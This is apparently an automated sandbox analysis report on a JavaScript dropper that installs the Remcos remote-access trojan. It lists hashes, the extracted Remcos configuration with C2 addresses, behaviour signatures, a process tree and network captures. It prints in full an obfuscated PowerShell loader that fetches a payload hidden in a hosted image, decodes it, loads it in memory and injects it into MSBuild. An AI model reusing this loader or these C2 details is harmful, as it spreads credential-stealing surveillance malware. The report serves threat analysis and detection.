Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-12-2024 03:53

General

  • Target

    9b9059af739b167db6afce5129997e489dbb7baa3af27c8da5a68d564c2ed84e.js

  • Size

    4KB

  • MD5

    9c23d2a7acc6acc81022dee56521c2ba

  • SHA1

    40a93bafef8bfeec099f8f8f758336fe41a82a81

  • SHA256

    9b9059af739b167db6afce5129997e489dbb7baa3af27c8da5a68d564c2ed84e

  • SHA512

    193760ec2b498a40d2eb932314668aaf07c15d69b64ade12fe75e62d92a0a5ca34201f8f1c4a070b0e574e433fdf62fbe1785bbd2279f8e7fd58d2080df3aa88

  • SSDEEP

    48:zto05EfkLolvMHs8Zcj6qHs9aCgUvZ5LbmnpFP:ztFqfkL+vhj6qHsl5Z5LyrP

Malware Config

Extracted

Language
ps1
Source
1
if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::FromBase64String($orcas);$synizesis = [System.Reflection.Assembly]::Load($pervasivenesses);$vulcanisms = [dnlib.IO.Home].GetMethod('VAI');$vulcanisms.Invoke($null, @('0/tBcDi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'MSBuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };
URLs
ps1.dropper

https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20

exe.dropper

https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20

Extracted

Family

remcos

Botnet

RemoteHost

C2

160.25.73.25:6426

ruffella.duckdns.org:6426

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-QM0FWK

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\9b9059af739b167db6afce5129997e489dbb7baa3af27c8da5a68d564c2ed84e.js
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2992
    • C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" C:\Windows\Temp\あ😒2⛑ぇ😯4♘オ😍4⛒く😾5.js
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:888
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGUAbQBvAHIAYQBuAGQAdQBtAHMAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJABjAG8AbgBlAG4AbwBzAGUAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQAgAD0AIAAkAGMAbwBuAGUAbgBvAHMAZQBzAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AZQBtAG8AcgBhAG4AZAB1AG0AcwApADsAJABlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQApADsAJAByAGUAcwBlAG4AdABpAHYAZQAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAbwB2AGUAcgBwAGEAYwBrACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHcAYQBsAGwAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAHMAZQBuAHQAaQB2AGUAKQA7ACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAbwB2AGUAcgBwAGEAYwBrACkAOwAkAHcAYQBsAGwAZQBkACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQBnAHQAIAAkAHcAYQBsAGwAZQBkADsAJAB3AGEAbABsAGUAZAAgACsAPQAgACQAcgBlAHMAZQBuAHQAaQB2AGUALgBMAGUAbgBnAHQAaAA7ACQAbABlAGcAYQB0AGkAbgBlACAAPQAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQAgACQAdwBhAGwAbABlAGQAOwAkAG0AZQB0AGUAbwByAGkAdABpAGMAIAA9ACAAJABlAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdwBhAGwAbABlAGQALAAgACQAbABlAGcAYQB0AGkAbgBlACkAOwAkAG8AcgBjAGEAcwAgAD0AIAAtAGoAbwBpAG4AIAAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAEwAZQBuAGcAdABoACkAXQA7ACQAcABlAHIAdgBhAHMAaQB2AGUAbgBlAHMAcwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbwByAGMAYQBzACkAOwAkAHMAeQBuAGkAegBlAHMAaQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAHAAZQByAHYAYQBzAGkAdgBlAG4AZQBzAHMAZQBzACkAOwAkAHYAdQBsAGMAYQBuAGkAcwBtAHMAIAA9ACAAWwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAVgBBAEkAJwApADsAJAB2AHUAbABjAGEAbgBpAHMAbQBzAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAEAAKAAnADAALwB0AEIAYwBEAGkALwByAC8AZQBlAC4AZQB0AHMAYQBwAC8ALwA6AHMAcAB0AHQAaAAnACwAIAAnAGMAbwBuAHMAdABhAG4AdABhAG4AJwAsACAAJwBjAG8AbgBzAHQAYQBuAHQAYQBuACcALAAgACcAYwBvAG4AcwB0AGEAbgB0AGEAbgAnACwAIAAnAE0AUwBCAHUAaQBsAGQAJwAsACAAJwBjAG8AbgBzAHQAYQBuAHQAYQBuACcALAAgACcAYwBvAG4AcwB0AGEAbgB0AGEAbgAnACwAJwBjAG8AbgBzAHQAYQBuAHQAYQBuACcALAAnAGMAbwBuAHMAdABhAG4AdABhAG4AJwAsACcAYwBvAG4AcwB0AGEAbgB0AGEAbgAnACwAJwBjAG8AbgBzAHQAYQBuAHQAYQBuACcALAAnAGMAbwBuAHMAdABhAG4AdABhAG4AJwAsACcAMQAnACwAJwBjAG8AbgBzAHQAYQBuAHQAYQBuACcAKQApADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsA';$asphyxiation = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($forsakers));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $asphyxiation
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2676
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::FromBase64String($orcas);$synizesis = [System.Reflection.Assembly]::Load($pervasivenesses);$vulcanisms = [dnlib.IO.Home].GetMethod('VAI');$vulcanisms.Invoke($null, @('0/tBcDi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'MSBuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4808
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            5⤵
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2432
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\Admin\AppData\Local\Temp\kqelxapnqggqyolidygkpeurtbxorgmui"
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1108
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\Admin\AppData\Local\Temp\mtkvy"
              6⤵
              • Accesses Microsoft Outlook accounts
              • System Location Discovery: System Language Discovery
              PID:3928
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\Admin\AppData\Local\Temp\wnpozllis"
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5112

Network

  • flag-us
    DNS
    res.cloudinary.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    res.cloudinary.com
    IN A
    Response
    res.cloudinary.com
    IN CNAME
    resc.cloudinary.com.cdn.cloudflare.net
    resc.cloudinary.com.cdn.cloudflare.net
    IN A
    104.17.202.1
    resc.cloudinary.com.cdn.cloudflare.net
    IN A
    104.17.201.1
  • flag-us
    GET
    https://res.cloudinary.com/dzakc3wag/raw/upload/v1734112417/uploaded_textfile
    wscript.exe
    Remote address:
    104.17.202.1:443
    Request
    GET /dzakc3wag/raw/upload/v1734112417/uploaded_textfile HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: res.cloudinary.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Sun, 15 Dec 2024 03:53:29 GMT
    Content-Type: application/octet-stream
    Content-Length: 157299
    Connection: keep-alive
    CF-Ray: 8f237ca83bc67723-LHR
    Accept-Ranges: bytes
    Access-Control-Allow-Origin: *
    Cache-Control: public, no-transform, immutable, max-age=2592000
    Content-Disposition: attachment; filename="uploaded_textfile"
    ETag: "e39538cf60c1a9768333bf00e0262702"
    Last-Modified: Fri, 13 Dec 2024 17:53:38 GMT
    Strict-Transport-Security: max-age=604800
    Vary: Accept-Encoding
    access-control-expose-headers: Content-Length,Content-Disposition,ETag,Server-Timing,Vary
    server-timing: cld-cloudflare;dur=22;start=2024-12-15T03:53:29.649Z;desc=hit,rtt;dur=48
    timing-allow-origin: *
    x-request-id: 09309909e85cdcf78096ba77219125ea
    Server: cloudflare
  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    DNS
    133.211.185.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.211.185.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    1.202.17.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    1.202.17.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.214.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.214.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    22.249.124.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    22.249.124.192.in-addr.arpa
    IN PTR
    Response
    22.249.124.192.in-addr.arpa
    IN PTR
    cloudproxy10022sucurinet
  • flag-us
    GET
    https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
    powershell.exe
    Remote address:
    104.17.202.1:443
    Request
    GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1
    Host: res.cloudinary.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Sun, 15 Dec 2024 03:53:30 GMT
    Content-Type: image/jpeg
    Content-Length: 2230233
    Connection: keep-alive
    CF-Ray: 8f237caf8b6194e4-LHR
    Accept-Ranges: bytes
    Access-Control-Allow-Origin: *
    Cache-Control: public, no-transform, immutable, max-age=2592000
    ETag: "7b9a6708dc7c92995f443d0b41dbc8d0"
    Last-Modified: Mon, 02 Dec 2024 10:22:29 GMT
    Strict-Transport-Security: max-age=604800
    Vary: Accept-Encoding
    access-control-expose-headers: Content-Length,ETag,Server-Timing,Vary,x-content-type-options
    server-timing: cld-cloudflare;dur=18;start=2024-12-15T03:53:30.814Z;desc=hit,rtt;dur=51,content-info;desc="width=1920,height=1080,bytes=2230233,o=1,ef=(17);"
    timing-allow-origin: *
    x-content-type-options: nosniff
    x-request-id: 6f487a4c60d72621f2efeecff85ca20a
    Server: cloudflare
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    209.205.72.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.205.72.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    paste.ee
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    paste.ee
    IN A
    Response
    paste.ee
    IN A
    104.21.84.67
    paste.ee
    IN A
    172.67.187.200
  • flag-us
    GET
    https://paste.ee/r/iDcBt/0
    powershell.exe
    Remote address:
    104.21.84.67:443
    Request
    GET /r/iDcBt/0 HTTP/1.1
    Host: paste.ee
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Sun, 15 Dec 2024 03:53:39 GMT
    Content-Type: text/plain; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: max-age=2592000
    strict-transport-security: max-age=63072000
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-xss-protection: 1; mode=block
    content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
    CF-Cache-Status: HIT
    Age: 95197
    Last-Modified: Sat, 14 Dec 2024 01:27:02 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eyDw1lfxvGQqa7XOJ9xLShoZgADYc%2FWs9Jmp05m7wLnp009iaRQD0AecYvtpk9OP6LGN9shcsDG7NZEo%2FAfLBcQ1CXFGwmAlOVxd%2BY1VdI35Ys1o%2B0AOPB7q3A%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f237ce5aa479521-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=48695&min_rtt=47202&rtt_var=12530&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2977&recv_bytes=359&delivery_rate=76452&cwnd=253&unsent_bytes=0&cid=f144c36d67ed71dc&ts=126&x=0"
  • flag-us
    DNS
    67.84.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    67.84.21.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    25.73.25.160.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    25.73.25.160.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    geoplugin.net
    MSBuild.exe
    Remote address:
    8.8.8.8:53
    Request
    geoplugin.net
    IN A
    Response
    geoplugin.net
    IN A
    178.237.33.50
  • flag-nl
    GET
    http://geoplugin.net/json.gp
    MSBuild.exe
    Remote address:
    178.237.33.50:80
    Request
    GET /json.gp HTTP/1.1
    Host: geoplugin.net
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    date: Sun, 15 Dec 2024 03:53:41 GMT
    server: Apache
    content-length: 956
    content-type: application/json; charset=utf-8
    cache-control: public, max-age=300
    access-control-allow-origin: *
  • flag-us
    DNS
    50.33.237.178.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    50.33.237.178.in-addr.arpa
    IN PTR
    Response
    50.33.237.178.in-addr.arpa
    IN CNAME
    50.32/27.178.237.178.in-addr.arpa
  • flag-us
    DNS
    56.163.245.4.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.163.245.4.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    241.42.69.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.42.69.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    77.190.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    77.190.18.2.in-addr.arpa
    IN PTR
    Response
    77.190.18.2.in-addr.arpa
    IN PTR
    a2-18-190-77deploystaticakamaitechnologiescom
  • flag-us
    DNS
    14.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    14.227.111.52.in-addr.arpa
    IN PTR
    Response
  • 104.17.202.1:443
    https://res.cloudinary.com/dzakc3wag/raw/upload/v1734112417/uploaded_textfile
    tls, http
    wscript.exe
    7.0kB
    171.2kB
    138
    134

    HTTP Request

    GET https://res.cloudinary.com/dzakc3wag/raw/upload/v1734112417/uploaded_textfile

    HTTP Response

    200
  • 104.17.202.1:443
    https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
    tls, http
    powershell.exe
    68.1kB
    2.3MB
    1183
    1664

    HTTP Request

    GET https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg

    HTTP Response

    200
  • 104.21.84.67:443
    https://paste.ee/r/iDcBt/0
    tls, http
    powershell.exe
    12.1kB
    685.4kB
    255
    502

    HTTP Request

    GET https://paste.ee/r/iDcBt/0

    HTTP Response

    200
  • 160.25.73.25:6426
    tls
    MSBuild.exe
    3.4kB
    1.7kB
    14
    17
  • 160.25.73.25:6426
    tls
    MSBuild.exe
    35.1kB
    513.0kB
    222
    401
  • 178.237.33.50:80
    http://geoplugin.net/json.gp
    http
    MSBuild.exe
    623 B
    1.3kB
    12
    3

    HTTP Request

    GET http://geoplugin.net/json.gp

    HTTP Response

    200
  • 8.8.8.8:53
    res.cloudinary.com
    dns
    powershell.exe
    64 B
    148 B
    1
    1

    DNS Request

    res.cloudinary.com

    DNS Response

    104.17.202.1
    104.17.201.1

  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
    90 B
    1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    133.211.185.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    133.211.185.52.in-addr.arpa

  • 8.8.8.8:53
    1.202.17.104.in-addr.arpa
    dns
    71 B
    133 B
    1
    1

    DNS Request

    1.202.17.104.in-addr.arpa

  • 8.8.8.8:53
    172.214.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.214.232.199.in-addr.arpa

  • 8.8.8.8:53
    22.249.124.192.in-addr.arpa
    dns
    73 B
    113 B
    1
    1

    DNS Request

    22.249.124.192.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    209.205.72.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    209.205.72.20.in-addr.arpa

  • 8.8.8.8:53
    paste.ee
    dns
    powershell.exe
    54 B
    86 B
    1
    1

    DNS Request

    paste.ee

    DNS Response

    104.21.84.67
    172.67.187.200

  • 8.8.8.8:53
    67.84.21.104.in-addr.arpa
    dns
    71 B
    133 B
    1
    1

    DNS Request

    67.84.21.104.in-addr.arpa

  • 8.8.8.8:53
    25.73.25.160.in-addr.arpa
    dns
    71 B
    125 B
    1
    1

    DNS Request

    25.73.25.160.in-addr.arpa

  • 8.8.8.8:53
    geoplugin.net
    dns
    MSBuild.exe
    59 B
    75 B
    1
    1

    DNS Request

    geoplugin.net

    DNS Response

    178.237.33.50

  • 8.8.8.8:53
    50.33.237.178.in-addr.arpa
    dns
    72 B
    155 B
    1
    1

    DNS Request

    50.33.237.178.in-addr.arpa

  • 8.8.8.8:53
    56.163.245.4.in-addr.arpa
    dns
    71 B
    157 B
